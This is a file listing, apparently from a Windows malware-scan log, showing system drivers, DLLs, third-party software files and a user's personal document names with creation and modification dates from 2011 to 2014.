2014-10-03 10:24 - 2014-06-26 16:17 - 000008856 _____ (Microsoft Corporation) C:\Windows\system32\icardres.dll
2014-10-03 10:24 - 2014-06-05 22:28 - 000035480 _____ (Microsoft Corporation) C:\Windows\system32\TsWpfWrp.exe
2014-09-24 13:26 - 2014-06-13 18:44 - 000638400 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgkrnl.sys
2014-09-24 13:26 - 2014-06-13 18:33 - 000037376 _____ (Microsoft Corporation) C:\Windows\system32\cdd.dll
2014-09-24 13:26 - 2014-06-02 04:31 - 000332800 _____ (Microsoft Corporation) C:\Windows\system32\msihnd.dll
2014-09-24 13:26 - 2014-06-02 04:30 - 001993728 _____ (Microsoft Corporation) C:\Windows\system32\authui.dll
2014-09-24 13:26 - 2014-06-02 04:30 - 000033280 _____ (Microsoft Corporation) C:\Windows\system32\appinfo.dll
2014-09-24 13:26 - 2014-06-02 02:56 - 000082432 _____ (Microsoft Corporation) C:\Windows\system32\consent.exe
2014-07-10 10:54 - 2014-06-06 02:59 - 000506880 _____ (Microsoft Corporation) C:\Windows\system32\qedit.dll
2014-07-10 10:54 - 2014-05-30 00:53 - 000273408 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\afd.sys
2014-06-12 11:41 - 2014-04-26 10:01 - 000502784 _____ (Microsoft Corporation) C:\Windows\system32\usp10.dll
2014-06-12 11:41 - 2014-04-04 20:42 - 000905664 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tcpip.sys
2014-06-12 11:19 - 2014-06-12 11:19 - 000000000 ____D C:\Program Files\Common Files\DESIGNER
2014-05-07 15:08 - 2014-05-07 15:08 - 000000000 ____D C:\ProgramData\Visan
2014-05-07 15:04 - 2014-05-07 15:04 - 000000057 _____ C:\ProgramData\Ament.ini
2014-04-21 15:24 - 2014-04-21 15:24 - 000017512 _____ (Absolute Software Corp.) C:\Windows\system32\wceprv.dll
2014-03-31 22:46 - 2014-03-31 22:46 - 001070232 _____ (Microsoft Corporation) C:\Windows\system32\MSCOMCTL.OCX
2014-03-31 22:46 - 2014-03-31 22:46 - 000130712 _____ (Microsoft Corporation) C:\Windows\system32\MSSTDFMT.DLL
2014-03-31 12:29 - 2017-12-20 12:32 - 000065512 _____ (Absolute Software Corporation) C:\Windows\system32\identprv.dll
2014-03-12 23:01 - 2014-01-30 01:46 - 000876032 _____ (Microsoft Corporation) C:\Windows\system32\wer.dll
2014-01-27 12:10 - 2018-10-30 18:35 - 000000000 ____D C:\Users\Angela\AppData\Local\CrashDumps
2014-01-06 18:53 - 2014-01-06 18:53 - 000000439 _____ C:\Users\Angela\Desktop\2014 - Shortcut.lnk
2014-01-06 18:52 - 2014-01-06 18:52 - 000000439 _____ C:\Users\Angela\Desktop\2013 - Shortcut.lnk
2014-01-06 18:39 - 2007-03-25 19:20 - 000000000 ____D C:\Users\Angela\Documents\2014
2014-01-06 18:38 - 2015-04-01 18:18 - 000000000 ____D C:\Users\Angela\Documents\2013
2014-01-06 12:50 - 2014-01-06 17:41 - 000247160 _____ C:\Users\Angela\Downloads\transactions.csv
2014-01-04 18:37 - 2014-01-06 12:53 - 000000000 ____D C:\Users\Angela\Documents\2012
2013-12-10 13:57 - 2013-10-29 20:12 - 000335360 _____ (Microsoft Corporation) C:\Windows\system32\SysFxUI.dll
2013-12-10 13:57 - 2013-10-29 19:43 - 000130048 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\drmk.sys
2013-12-10 13:57 - 2013-10-29 18:43 - 000167936 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\portcls.sys
2013-12-10 13:57 - 2013-10-22 01:19 - 000158208 _____ (Microsoft Corporation) C:\Windows\system32\imagehlp.dll
2013-12-10 13:57 - 2013-10-10 20:08 - 000172032 _____ (Microsoft Corporation) C:\Windows\system32\scrrun.dll
2013-12-10 13:57 - 2013-10-10 20:08 - 000131072 _____ (Microsoft Corporation) C:\Windows\system32\wshom.ocx
2013-12-10 13:57 - 2013-10-10 20:08 - 000036864 _____ (Microsoft Corporation) C:\Windows\system32\wshcon.dll
2013-12-10 13:57 - 2013-10-10 18:35 - 000155648 _____ (Microsoft Corporation) C:\Windows\system32\wscript.exe
2013-12-10 13:57 - 2013-10-10 18:35 - 000135168 _____ (Microsoft Corporation) C:\Windows\system32\cscript.exe
2013-12-05 15:44 - 2013-12-05 15:44 - 000000000 ____H C:\Windows\system32\Drivers\Msft_User_WpdMtpDr_01_07_00.Wdf
2013-11-29 18:11 - 2013-11-29 18:11 - 000000000 ____D C:\Program Files\MSXML 4.0
2013-11-27 19:41 - 2013-11-27 20:20 - 000000000 ____D C:\Users\Angela\Documents\SelfMV
2013-11-27 19:29 - 2013-11-27 19:29 - 000000000 ____D C:\Users\Public\Documents\NativeFus_Log
2013-11-27 19:29 - 2013-11-27 19:29 - 000000000 ____D C:\Users\Public\Documents\CrashDump
2013-11-27 19:27 - 2013-08-20 22:31 - 000015560 _____ (MCCI Corporation) C:\Windows\system32\Drivers\sscdcm.sys
2013-11-27 19:27 - 2013-08-20 22:31 - 000015304 _____ (MCCI Corporation) C:\Windows\system32\Drivers\sscdwh.sys
2013-11-27 19:24 - 2013-11-27 20:49 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Samsung
2013-11-27 19:24 - 2013-10-30 13:13 - 004659712 _____ (Dmitry Streblechenko) C:\Windows\system32\Redemption.dll
2013-11-27 19:22 - 2018-10-30 23:47 - 000000000 ____D C:\Users\Angela\AppData\Local\Downloaded Installations
2013-11-24 15:50 - 2013-11-24 15:50 - 000000000 ____D C:\Program Files\Common Files\Motorola Shared
2013-11-24 13:50 - 2013-11-24 13:50 - 000000000 ____D C:\Windows\system32\VirtualExpander
2013-11-24 13:43 - 2015-09-25 09:39 - 000000000 ____D C:\Users\Angela\Documents\Resume
2013-11-24 13:43 - 2013-11-24 13:43 - 000000000 ____D C:\Users\Angela\Documents\Readme_flashdemo
2013-11-24 13:42 - 2013-11-24 13:42 - 000000000 ____D C:\Users\Angela\Documents\Conditional use letter
2013-11-24 13:42 - 2013-11-24 13:42 - 000000000 ____D C:\Users\Angela\Documents\Conditional use and Variance
2013-11-20 14:05 - 2013-11-20 14:05 - 000056364 _____ C:\Users\Angela\Downloads\PGRNovemberBill.html
2013-11-17 13:08 - 2013-10-10 20:08 - 000444928 _____ (Microsoft Corporation) C:\Windows\system32\IKEEXT.DLL
2013-11-17 13:08 - 2013-10-10 20:07 - 000596480 _____ (Microsoft Corporation) C:\Windows\system32\FWPUCLNT.DLL
2013-11-17 13:08 - 2013-10-10 18:39 - 000218228 _____ C:\Windows\system32\WFP.TMF
2013-11-17 13:08 - 2013-10-03 06:45 - 000993792 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2013-10-30 13:06 - 2013-10-30 13:06 - 000974848 _____ C:\Windows\system32\cis-2.4.dll
2013-10-30 13:06 - 2013-10-30 13:06 - 000569344 _____ ((c) MusicCity) C:\Windows\system32\muzdecode.ax
2013-10-30 13:06 - 2013-10-30 13:06 - 000491520 _____ (Musiccity Co.Ltd.) C:\Windows\system32\muzapp.dll
2013-10-30 13:06 - 2013-10-30 13:06 - 000352256 _____ (Sample Corporation) C:\Windows\system32\MSLUR71.dll
2013-10-30 13:06 - 2013-10-30 13:06 - 000258048 _____ ((c) PeeringPortal) C:\Windows\system32\muzoggsp.ax
2013-10-30 13:06 - 2013-10-30 13:06 - 000245760 _____ (Teruten Inc.) C:\Windows\system32\MSCLib.dll
2013-10-30 13:06 - 2013-10-30 13:06 - 000200704 _____ ( (c) MusicCity) C:\Windows\system32\muzwmts.dll
2013-10-30 13:06 - 2013-10-30 13:06 - 000172032 _____ (Musiccity Co.Ltd.) C:\Windows\system32\muzapp.exe
2013-10-30 13:06 - 2013-10-30 13:06 - 000155648 _____ (Teruten Inc.) C:\Windows\system32\MSFLib.dll
2013-10-30 13:06 - 2013-10-30 13:06 - 000143360 _____ C:\Windows\system32\3DAudio.ax
2013-10-30 13:06 - 2013-10-30 13:06 - 000135168 _____ (Musiccity Co.Ltd.) C:\Windows\system32\muzaf1.dll
2013-10-30 13:06 - 2013-10-30 13:06 - 000131072 _____ ((c) MusicCity) C:\Windows\system32\muzmpgsp.ax
2013-10-30 13:06 - 2013-10-30 13:06 - 000122880 _____ ((c) MUSICCITY) C:\Windows\system32\muzeffect.ax
2013-10-30 13:06 - 2013-10-30 13:06 - 000118784 _____ ((주)마크애니) C:\Windows\system32\MaDRM.dll
2013-10-30 13:06 - 2013-10-30 13:06 - 000110592 _____ ((c) MusicCity) C:\Windows\system32\muzmp4sp.ax
2013-10-30 13:06 - 2013-10-30 13:06 - 000081920 _____ C:\Windows\system32\issacapi_bs-2.3.dll
2013-10-30 13:06 - 2013-10-30 13:06 - 000065536 _____ C:\Windows\system32\issacapi_pe-2.3.dll
2013-10-30 13:06 - 2013-10-30 13:06 - 000057344 _____ C:\Windows\system32\issacapi_se-2.3.dll
2013-10-30 13:06 - 2013-10-30 13:06 - 000057344 _____ (Marktek) C:\Windows\system32\MK_Lyric.dll
2013-10-30 13:06 - 2013-10-30 13:06 - 000057344 _____ (Marktek Inc.) C:\Windows\system32\MTXSYNCICON.dll
2013-10-30 13:06 - 2013-10-30 13:06 - 000049152 _____ ((주) 마크애니) C:\Windows\system32\MaJGUILib.dll
2013-10-30 13:06 - 2013-10-30 13:06 - 000045320 _____ (MARKANY) C:\Windows\system32\MAMACExtract.dll
2013-10-30 13:06 - 2013-10-30 13:06 - 000045056 _____ ((주) 마크애니) C:\Windows\system32\MaXMLProto.dll
2013-10-30 13:06 - 2013-10-30 13:06 - 000045056 _____ ((주) 마크애니) C:\Windows\system32\MACXMLProto.dll
2013-10-30 13:06 - 2013-10-30 13:06 - 000040960 _____ (Telechips Inc.,) C:\Windows\system32\MTTELECHIP.dll
2013-10-30 13:06 - 2013-10-30 13:06 - 000024576 _____ ((주)마크애니) C:\Windows\system32\MASetupCleaner.exe
2013-10-28 20:10 - 2013-10-28 20:10 - 000000079 _____ C:\Users\Angela\AppData\Local\DVDPATH.TXT
2013-10-11 11:45 - 2013-07-02 20:33 - 000035328 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbscan.sys
2013-10-11 11:45 - 2013-07-02 20:10 - 000025472 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\hidparse.sys
2013-10-11 11:45 - 2013-06-28 20:07 - 000226304 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbport.sys
2013-10-11 11:45 - 2013-06-28 20:07 - 000197632 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbhub.sys
2013-10-11 11:45 - 2013-06-28 20:07 - 000073216 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbccgp.sys
2013-10-11 11:45 - 2013-06-28 20:06 - 000006016 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbd.sys
2013-10-11 11:45 - 2013-06-26 17:01 - 000527064 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\Wdf01000.sys
2013-10-11 11:45 - 2011-05-05 07:54 - 000039936 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbehci.sys
2013-10-11 11:45 - 2011-05-05 07:54 - 000023552 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbuhci.sys
2013-10-05 14:46 - 2013-10-05 14:46 - 000138466 _____ C:\Users\Angela\Documents\birthplan_pdf.pdf
2013-10-01 13:37 - 2013-10-11 11:40 - 000000000 ____D C:\Users\Angela\Documents\Mesquite Rental Desert Gold Dispute
2013-10-01 13:25 - 2013-10-01 13:25 - 000332222 _____ C:\Users\Angela\Downloads\Security Deposit Disbursement Statement for 156 DW C.pdf
2013-09-19 17:25 - 2013-08-01 22:09 - 001548288 _____ (Microsoft Corporation) C:\Windows\system32\WMVDECOD.DLL
2013-09-19 17:25 - 2013-07-15 22:35 - 000615936 _____ (Microsoft Corporation) C:\Windows\system32\themeui.dll
2013-09-19 17:05 - 2007-03-20 03:28 - 000000000 ____D C:\Windows\system32\MRT
2013-09-11 22:21 - 2013-09-11 22:21 - 000863344 _____ (Microsoft Corporation) C:\Windows\system32\msvcr110_clr0400.dll
2013-09-11 22:21 - 2013-09-11 22:21 - 000501872 _____ (Microsoft Corporation) C:\Windows\system32\msvcp110_clr0400.dll
2013-09-11 22:21 - 2013-09-11 22:21 - 000028776 _____ (Microsoft Corporation) C:\Windows\system32\aspnet_counters.dll
2013-09-11 22:21 - 2013-09-11 22:21 - 000018000 _____ (Microsoft Corporation) C:\Windows\system32\msvcr100_clr0400.dll
2013-08-26 14:31 - 2013-07-07 22:20 - 000172544 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2013-08-26 14:31 - 2013-07-07 22:16 - 000133120 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2013-08-26 14:31 - 2013-07-07 22:16 - 000098304 _____ (Microsoft Corporation) C:\Windows\system32\cryptnet.dll
2013-08-26 14:31 - 2013-06-15 07:22 - 000015872 _____ (Microsoft Corporation) C:\Windows\system32\icaapi.dll
2013-08-26 14:31 - 2013-06-15 05:23 - 000024064 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tssecsrv.sys
2013-08-13 22:33 - 2013-08-13 22:33 - 000271032 _____ (Hewlett-Packard Co.) C:\Windows\system32\hpinkstsB511LM.dll
2013-08-13 16:33 - 2013-08-13 22:33 - 002220216 _____ (Hewlett-Packard Co.) C:\Windows\system32\hpinkinsB511.exe
2013-08-13 16:33 - 2013-08-13 22:33 - 000222904 _____ (Hewlett-Packard Co.) C:\Windows\system32\hpinkcoiB511.dll
2013-08-04 16:32 - 2012-07-25 21:39 - 000047720 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\WdfLdr.sys
2013-08-04 16:32 - 2012-07-25 21:21 - 000196608 _____ (Microsoft Corporation) C:\Windows\system32\WUDFHost.exe
2013-08-04 16:32 - 2012-07-25 21:20 - 000613888 _____ (Microsoft Corporation) C:\Windows\system32\WUDFx.dll
2013-08-04 16:32 - 2012-07-25 21:20 - 000172032 _____ (Microsoft Corporation) C:\Windows\system32\WUDFPlatform.dll
2013-08-04 16:32 - 2012-07-25 21:20 - 000073216 _____ (Microsoft Corporation) C:\Windows\system32\WUDFSvc.dll
2013-08-04 16:32 - 2012-07-25 21:20 - 000038912 _____ (Microsoft Corporation) C:\Windows\system32\WUDFCoinstaller.dll
2013-08-04 16:32 - 2012-07-25 20:46 - 000009728 _____ (Microsoft Corporation) C:\Windows\system32\Wdfres.dll
2013-08-04 16:32 - 2012-07-25 20:33 - 000066560 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\WUDFPf.sys
2013-08-04 16:32 - 2012-07-25 20:32 - 000155136 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\WUDFRd.sys
2013-08-04 16:32 - 2012-06-02 08:57 - 000000003 _____ C:\Windows\system32\Drivers\MsftWdf_User_01_11_00_Inbox_Critical.Wdf
2013-08-04 16:32 - 2009-07-14 06:12 - 000016896 _____ (Microsoft Corporation) C:\Windows\system32\winusb.dll
2013-08-04 16:32 - 2009-07-13 17:51 - 000034944 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\winusb.sys
2013-08-04 15:36 - 2012-05-11 09:57 - 000623616 _____ (Microsoft Corporation) C:\Windows\system32\localspl.dll
2013-08-04 15:35 - 2012-11-02 04:18 - 000376320 _____ (Microsoft Corporation) C:\Windows\system32\dpnet.dll
2013-08-04 15:35 - 2012-11-02 02:26 - 000023040 _____ (Microsoft Corporation) C:\Windows\system32\dpnsvr.exe
2013-08-04 15:35 - 2012-09-25 10:19 - 000075776 _____ (Microsoft Corporation) C:\Windows\system32\synceng.dll
2013-08-04 15:35 - 2012-08-21 05:47 - 000224640 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\volsnap.sys
2013-08-04 15:35 - 2012-06-29 10:01 - 000467968 _____ (Microsoft Corporation) C:\Windows\system32\netapi32.dll
2013-08-04 15:34 - 2013-05-01 22:04 - 000443904 _____ (Microsoft Corporation) C:\Windows\system32\win32spl.dll
2013-08-04 15:34 - 2013-05-01 22:03 - 000037376 _____ (Microsoft Corporation) C:\Windows\system32\printcom.dll
2013-08-04 15:34 - 2013-04-23 22:00 - 000041984 _____ (Microsoft Corporation) C:\Windows\system32\certenc.dll
2013-08-04 15:34 - 2013-04-23 19:46 - 000812544 _____ (Microsoft Corporation) C:\Windows\system32\certutil.exe
2013-08-04 15:34 - 2013-03-03 13:07 - 001082232 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ntfs.sys
2013-08-04 15:34 - 2012-11-21 21:54 - 000353280 _____ (Microsoft Corporation) C:\Windows\system32\shlwapi.dll
2013-08-04 15:34 - 2012-11-19 22:22 - 000204288 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2013-08-04 15:34 - 2012-11-07 21:48 - 001314816 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2013-08-04 15:33 - 2013-04-17 06:30 - 000024576 _____ (Microsoft Corporation) C:\Windows\system32\cryptdlg.dll
2013-08-04 15:33 - 2013-03-07 21:53 - 000376320 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll
2013-08-04 15:33 - 2013-02-11 19:57 - 000015872 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usb8023x.sys
2013-08-04 15:33 - 2013-02-11 19:57 - 000015872 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usb8023.sys
2013-08-04 15:33 - 2012-05-01 08:03 - 000180736 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpwd.sys
2013-08-04 15:10 - 2013-08-04 16:12 - 000047616 _____ C:\Users\Angela\Downloads\Copy of Daily Report Sample (1).xls
2013-08-04 14:24 - 2013-08-04 14:24 - 000000000 ____D C:\Users\Angela\Downloads\NETGEAR
2013-08-04 14:20 - 2013-08-04 14:20 - 000055296 _____ C:\Users\Angela\Downloads\Copy of Daily Report Sample.xls
2013-07-31 13:36 - 2013-07-31 13:36 - 000001786 _____ C:\Users\Public\Desktop\NETGEAR WNA1000M Genie.lnk
2013-07-31 13:36 - 2013-07-31 13:36 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NETGEAR WNA1000M Genie
2013-07-31 13:36 - 2013-07-31 13:36 - 000000000 ____D C:\Program Files\NETGEAR
2013-07-31 13:35 - 2013-07-31 13:35 - 000000000 ____D C:\Windows\Downloaded Installations
2013-05-07 19:05 - 2012-06-02 16:19 - 001933848 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2013-05-07 19:05 - 2012-06-02 16:19 - 000577048 _____ (Microsoft Corporation) C:\Windows\system32\wuapi.dll
2013-05-07 19:05 - 2012-06-02 16:19 - 000053784 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe
2013-05-07 19:05 - 2012-06-02 16:19 - 000045080 _____ (Microsoft Corporation) C:\Windows\system32\wups2.dll
2013-05-07 19:05 - 2012-06-02 16:19 - 000035864 _____ (Microsoft Corporation) C:\Windows\system32\wups.dll
2013-05-07 19:05 - 2012-06-02 16:12 - 002422272 _____ (Microsoft Corporation) C:\Windows\system32\wucltux.dll
2013-05-07 19:05 - 2012-06-02 16:12 - 000088576 _____ (Microsoft Corporation) C:\Windows\system32\wudriver.dll
2013-05-07 19:04 - 2012-06-02 15:19 - 000171904 _____ (Microsoft Corporation) C:\Windows\system32\wuwebv.dll
2013-05-07 19:04 - 2012-06-02 15:12 - 000033792 _____ (Microsoft Corporation) C:\Windows\system32\wuapp.exe
2012-05-12 03:09 - 2012-03-20 17:28 - 000053120 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\partmgr.sys
2012-04-17 03:04 - 2012-02-29 09:11 - 000005120 _____ (Microsoft Corporation) C:\Windows\system32\wmi.dll
2012-04-17 03:04 - 2012-02-29 07:32 - 000012800 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\fs_rec.sys
2012-03-13 13:51 - 2012-01-09 09:54 - 000613376 _____ (Microsoft Corporation) C:\Windows\system32\rdpencom.dll
2012-02-27 16:06 - 2012-02-27 16:06 - 000000000 ____D C:\Windows\CheckSur
2012-02-23 11:04 - 2012-02-23 11:04 - 003695416 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dat
2012-02-23 11:04 - 2012-02-23 11:04 - 000434176 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2012-02-23 11:04 - 2012-02-23 11:04 - 000353584 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2012-02-23 11:04 - 2012-02-23 11:04 - 000227840 _____ (Microsoft Corporation) C:\Windows\system32\ieaksie.dll
2012-02-23 11:04 - 2012-02-23 11:04 - 000203776 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2012-02-23 11:04 - 2012-02-23 11:04 - 000163840 _____ (Microsoft Corporation) C:\Windows\system32\ieakui.dll
2012-02-23 11:04 - 2012-02-23 11:04 - 000162304 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2012-02-23 11:04 - 2012-02-23 11:04 - 000161792 _____ (Microsoft Corporation) C:\Windows\system32\msls31.dll
2012-02-23 11:04 - 2012-02-23 11:04 - 000152064 _____ (Microsoft Corporation) C:\Windows\system32\wextract.exe
2012-02-23 11:04 - 2012-02-23 11:04 - 000150528 _____ (Microsoft Corporation) C:\Windows\system32\iexpress.exe
2012-02-23 11:04 - 2012-02-23 11:04 - 000130560 _____ (Microsoft Corporation) C:\Windows\system32\ieakeng.dll
2012-02-23 11:04 - 2012-02-23 11:04 - 000123392 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll
2012-02-23 11:04 - 2012-02-23 11:04 - 000118784 _____ (Microsoft Corporation) C:\Windows\system32\iepeers.dll
2012-02-23 11:04 - 2012-02-23 11:04 - 000114176 _____ (Microsoft Corporation) C:\Windows\system32\advpack.dll
2012-02-23 11:04 - 2012-02-23 11:04 - 000110592 _____ (Microsoft Corporation) C:\Windows\system32\IEAdvpack.dll
2012-02-23 11:04 - 2012-02-23 11:04 - 000101888 _____ (Microsoft Corporation) C:\Windows\system32\admparse.dll
2012-02-23 11:04 - 2012-02-23 11:04 - 000086528 _____ (Microsoft Corporation) C:\Windows\system32\iesysprep.dll
2012-02-23 11:04 - 2012-02-23 11:04 - 000078848 _____ (Microsoft Corporation) C:\Windows\system32\inseng.dll
2012-02-23 11:04 - 2012-02-23 11:04 - 000076800 _____ (Microsoft Corporation) C:\Windows\system32\SetIEInstalledDate.exe
2012-02-23 11:04 - 2012-02-23 11:04 - 000074752 _____ (Microsoft Corporation) C:\Windows\system32\RegisterIEPKEYs.exe
2012-02-23 11:04 - 2012-02-23 11:04 - 000074752 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2012-02-23 11:04 - 2012-02-23 11:04 - 000074240 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2012-02-23 11:04 - 2012-02-23 11:04 - 000066048 _____ (Microsoft Corporation) C:\Windows\system32\icardie.dll
2012-02-23 11:04 - 2012-02-23 11:04 - 000063488 _____ (Microsoft Corporation) C:\Windows\system32\tdc.ocx
2012-02-23 11:04 - 2012-02-23 11:04 - 000054272 _____ (Microsoft Corporation) C:\Windows\system32\pngfilt.dll
2012-02-23 11:04 - 2012-02-23 11:04 - 000048640 _____ (Microsoft Corporation) C:\Windows\system32\mshtmler.dll
2012-02-23 11:04 - 2012-02-23 11:04 - 000035840 _____ (Microsoft Corporation) C:\Windows\system32\imgutil.dll
2012-02-23 11:04 - 2012-02-23 11:04 - 000031744 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2012-02-23 11:04 - 2012-02-23 11:04 - 000023552 _____ (Microsoft Corporation) C:\Windows\system32\licmgr10.dll
2012-02-20 22:39 - 2011-11-16 10:23 - 000377344 _____ (Microsoft Corporation) C:\Windows\system32\winhttp.dll
2012-02-20 22:39 - 2011-11-16 10:23 - 000072704 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2012-02-20 22:39 - 2011-11-16 08:12 - 000009728 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2012-02-20 22:38 - 2011-12-14 10:17 - 000680448 _____ (Microsoft Corporation) C:\Windows\system32\msvcrt.dll
2012-02-15 11:01 - 2012-02-15 11:01 - 004547944 _____ (Apple, Inc.) C:\Windows\system32\usbaaplrc.dll
2012-02-15 11:01 - 2012-02-15 11:01 - 000043520 _____ (Apple, Inc.) C:\Windows\system32\Drivers\usbaapl.sys
2012-01-26 22:21 - 2012-01-26 22:21 - 000000000 ____D C:\Users\Angela\AppData\Local\{9061903F-77E5-431A-AB33-DC3D492BBF4C}
2012-01-26 22:21 - 2012-01-26 22:21 - 000000000 ____D C:\Users\Angela\AppData\Local\{585A4D00-52AE-4BD6-931A-BF9E6D6097BD}
2012-01-13 16:27 - 2011-10-14 10:03 - 000189952 _____ (Microsoft Corporation) C:\Windows\system32\winmm.dll
2012-01-13 16:27 - 2011-10-14 10:00 - 000023552 _____ (Microsoft Corporation) C:\Windows\system32\mciseq.dll
2012-01-13 16:26 - 2011-10-25 09:58 - 000497152 _____ (Microsoft Corporation) C:\Windows\system32\qdvd.dll
2012-01-11 19:50 - 2012-01-11 19:50 - 000000000 ____H C:\Windows\system32\Drivers\Msft_Kernel_WinUSB_01007.Wdf
2012-01-11 19:47 - 2011-11-25 01:26 - 000013440 _____ (June Fabrics Technology Inc.) C:\Windows\system32\Drivers\pneteth.sys
2012-01-11 19:47 - 2009-11-08 02:41 - 001112288 _____ (Microsoft Corporation) C:\Windows\system32\WdfCoInstaller01007.dll
2012-01-11 19:47 - 2009-11-08 02:41 - 000581192 _____ (Microsoft Corporation) C:\Windows\system32\WinUSBCoInstaller.dll
2012-01-11 19:32 - 2013-11-24 15:50 - 000000000 ____D C:\Program Files\Motorola
2011-12-15 01:22 - 2011-10-14 10:02 - 000429056 _____ (Microsoft Corporation) C:\Windows\system32\EncDec.dll
2011-10-13 10:06 - 2011-07-29 10:01 - 000293376 _____ (Microsoft Corporation) C:\Windows\system32\psisdecd.dll
2011-10-13 10:06 - 2011-07-29 10:01 - 000217088 _____ (Microsoft Corporation) C:\Windows\system32\psisrndr.ax
2011-10-13 10:06 - 2011-07-29 10:00 - 000069632 _____ (Microsoft Corporation) C:\Windows\system32\Mpeg2Data.ax
2011-10-13 10:06 - 2011-07-29 10:00 - 000057856 _____ (Microsoft Corporation) C:\Windows\system32\MSDvbNP.ax
2011-10-13 10:04 - 2011-08-25 10:15 - 000555520 _____ (Microsoft Corporation) C:\Windows\system32\UIAutomationCore.dll
2011-10-13 10:04 - 2011-08-25 10:14 - 000238080 _____ (Microsoft Corporation) C:\Windows\system32\oleacc.dll
2011-10-13 10:04 - 2011-08-25 07:31 - 000004096 _____ (Microsoft Corporation) C:\Windows\system32\oleaccrc.dll
2011-08-11 22:17 - 2011-06-15 10:12 - 000182784 _____ (Microsoft Corporation) C:\Windows\system32\xmllite.dll
2011-06-14 22:46 - 2011-04-29 07:25 - 000146432 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv2.sys
2011-06-14 22:46 - 2011-04-29 07:25 - 000102400 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srvnet.sys
2011-06-14 22:46 - 2011-04-14 08:59 - 000075264 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dfsc.sys
2011-06-14 22:45 - 2011-05-02 11:16 - 000739328 _____ (Microsoft Corporation) C:\Windows\system32\inetcomm.dll
2011-04-26 22:27 - 2011-04-26 22:27 - 000000814 _____ C:\Users\Angela\Desktop\Magic DVD Copier.lnk
2011-04-26 22:27 - 2011-04-26 22:27 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Magic DVD Copier
2011-04-26 22:27 - 2011-04-26 22:27 - 000000000 ____D C:\Program Files\MagicDVDCopier
2011-04-26 20:57 - 2011-03-03 09:40 - 000028672 _____ (Microsoft Corporation) C:\Windows\system32\Apphlpdm.dll
2011-04-26 20:57 - 2011-03-03 07:35 - 004240384 _____ (Microsoft) C:\Windows\system32\GameUXLegacyGDFs.dll
2011-04-26 20:56 - 2011-03-12 15:55 - 000876032 _____ (Microsoft Corporation) C:\Windows\system32\XpsPrint.dll
2011-04-12 21:24 - 2011-03-10 11:03 - 001162240 _____ (Microsoft Corporation) C:\Windows\system32\mfc42u.dll
2011-04-12 21:24 - 2011-03-10 11:03 - 001136640 _____ (Microsoft Corporation) C:\Windows\system32\mfc42.dll
2011-04-12 21:24 - 2011-03-02 09:44 - 000168448 _____ (Microsoft Corporation) C:\Windows\system32\dnsapi.dll
2011-04-12 21:24 - 2011-03-02 09:44 - 000086528 _____ (Microsoft Corporation) C:\Windows\system32\dnsrslvr.dll
2011-04-12 21:24 - 2011-02-22 07:23 - 000069632 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\bowser.sys
2011-04-12 21:24 - 2009-05-04 03:59 - 000025088 _____ (Microsoft Corporation) C:\Windows\system32\dnscacheugc.exe
2011-03-22 19:25 - 2011-02-22 08:13 - 000288768 _____ (Microsoft Corporation) C:\Windows\system32\XpsGdiConverter.dll
2011-03-09 19:13 - 2011-03-09 19:14 - 000000000 ____D C:\Windows\XSxS
2011-03-09 19:13 - 2011-03-09 19:13 - 000000000 ____D C:\Users\Angela\AppData\Local\Xenocode
2011-03-09 19:13 - 2011-03-09 19:13 - 000000000 ____D C:\Program Files\Xenocode
2011-03-09 03:44 - 2010-12-29 12:28 - 000322560 _____ (Microsoft Corporation) C:\Windows\system32\sbe.dll
2011-03-09 03:44 - 2010-12-29 12:28 - 000153088 _____ (Microsoft Corporation) C:\Windows\system32\sbeio.dll
